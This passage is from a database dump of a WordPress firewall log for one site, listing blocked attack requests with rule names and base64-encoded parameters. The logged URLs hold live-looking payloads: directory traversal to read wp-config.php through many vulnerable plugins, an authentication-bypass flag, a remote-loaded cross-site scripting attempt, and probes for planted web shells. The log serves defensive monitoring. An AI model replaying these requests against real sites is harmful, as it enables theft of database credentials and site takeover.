Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb29nbGUtZG9jdW1lbnQtZW1iZWRkZXIvbGlicy9wZGYucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(919,1627816819.933255,1627816819.812800,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGVycnktcGx1Z2luL2FkbWluL2ltcG9ydC1leHBvcnQvZG93bmxvYWQtY29udGVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(920,1627816817.868701,1627816817.733700,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/force-download.php?file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvZm9yY2UtZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(921,1627816816.938231,1627816816.804500,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin.php?page=multi_metabox_listing&action=edit&id=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpZF0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(922,1627816835.440072,1627816835.023700,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/mac-dock-gallery/macdownload.php?albid=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thbGJpZF0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYWMtZG9jay1nYWxsZXJ5L21hY2Rvd25sb2FkLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(923,1627816834.494993,1627816834.054300,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/db-backup/download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kYi1iYWNrdXAvZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(924,1627816833.583458,1627816833.170800,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hc3Bvc2UtZG9jLWV4cG9ydGVyL2FzcG9zZV9kb2NfZXhwb3J0ZXJfZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(925,1627816832.751177,1627816832.273700,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(926,1627816831.774185,1627816831.346100,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(927,1627816830.846192,1627816830.423600,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/themes/mTheme-Unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlc10=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL21UaGVtZS1VbnVzL2Nzcy9jc3MucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(928,1627816897.440977,1627816897.001600,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(929,1627850858.784502,1627850858.294900,'\0\0\0\0\0\0\0\0\0\0��M�N',0,403,0,0,0,'https://ashbooks.co.uk/plugins/content/apismtp/apismtp.php.suspected?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhwLnN1c3BlY3RlZA==\",\"category\":\"brute-force\",\"ssl\":1}'),(930,1627850847.031349,1627850846.595700,'\0\0\0\0\0\0\0\0\0\0��M�N',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/apikey/apikey.php.suspected?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocC5zdXNwZWN0ZWQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(931,1627850831.175590,1627850830.735600,'\0\0\0\0\0\0\0\0\0\0��M�N',0,403,0,0,0,'https://ashbooks.co.uk/plugins/content/apismtp/apismtp.php?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(932,1627850821.367541,1627850820.465900,'\0\0\0\0\0\0\0\0\0\0��M�N',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(933,1627907569.199526,1627907568.482400,'\0\0\0\0\0\0\0\0\0\0����O',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(934,1627907579.910548,1627907579.296700,'\0\0\0\0\0\0\0\0\0\0����O',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(935,1627907575.396575,1627907574.612400,'\0\0\0\0\0\0\0\0\0\0����O',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(936,1627907590.124837,1627907589.974700,'\0\0\0\0\0\0\0\0\0\0����O',0,403,0,0,0,'https://ashbooks.co.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(937,1627907621.184325,1627907620.406100,'\0\0\0\0\0\0\0\0\0\0����O',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(938,1627907619.829856,1627907619.384000,'\0\0\0\0\0\0\0\0\0\0����O',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(939,1627933122.969662,1627933122.830900,'\0\0\0\0\0\0\0\0\0\0��%�ƴ',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin.php?page=supsystic-backup&tab=bupLog&download=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tkb3dubG9hZF0=\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(940,1627933122.638109,1627933122.163500,'\0\0\0\0\0\0\0\0\0\0��%�ƴ',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text%2Fhtml&mla_download_file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1ttbGFfZG93bmxvYWRfZmlsZV0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tZWRpYS1saWJyYXJ5LWFzc2lzdGFudC9pbmNsdWRlcy9tbGEtZmlsZS1kb3dubG9hZGVyLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(941,1628009722.562370,1628009722.122600,'\0\0\0\0\0\0\0\0\0\0��%\0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-includes/wp-class.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(942,1628009721.726855,1628009721.593500,'\0\0\0\0\0\0\0\0\0\0��%\0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-includes/wp-class.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(943,1628097153.050991,1628097152.636300,'\0\0\0\0\0\0\0\0\0\0��M�N',0,403,0,0,0,'https://ashbooks.co.uk/plugins/content/apismtp/apismtp.php.suspected?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhwLnN1c3BlY3RlZA==\",\"category\":\"brute-force\",\"ssl\":1}'),(944,1628097142.406642,1628097141.957200,'\0\0\0\0\0\0\0\0\0\0��M�N',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/apikey/apikey.php.suspected?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocC5zdXNwZWN0ZWQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(945,1628097128.685525,1628097128.540700,'\0\0\0\0\0\0\0\0\0\0��M�N',0,403,0,0,0,'https://ashbooks.co.uk/plugins/content/apismtp/apismtp.php?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(946,1628097119.135523,1628097118.704300,'\0\0\0\0\0\0\0\0\0\0��M�N',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(947,1628107636.264387,1628107636.128500,'\0\0\0\0\0\0\0\0\0\0��Xc\0i',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(948,1628107634.267994,1628107633.696100,'\0\0\0\0\0\0\0\0\0\0��Xc\0i',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(949,1628149844.209510,1628149843.735800,'\0\0\0\0\0\0\0\0\0\0��X$@',0,403,0,0,0,'https://ashbooks.co.uk/wp-json/trx_addons/v2/get/sc_layout?sc=print_r',NULL,'python-requests/2.18.4','blocked:waf','TRX Addons >= 1.6.50 - Remote Code Execution','{\"learningMode\":0,\"failedRules\":\"209\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWpzb24vdHJ4X2FkZG9ucy92Mi9nZXQvc2NfbGF5b3V0\",\"path\":\"L3dwLWpzb24vdHJ4X2FkZG9ucy92Mi9nZXQvc2NfbGF5b3V0\",\"category\":\"rce\",\"ssl\":1}'),(950,0.000000,1628217040.042322,'\0\0\0\0\0\0\0\0\0\0��6D �',0,200,0,0,0,'https://ashbooks.co.uk/?_wfsf=detectProxy','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1','scan:detectproxy',NULL,NULL),(951,1628277120.682307,1628277120.126400,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(952,1628277132.624014,1628277132.181600,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; 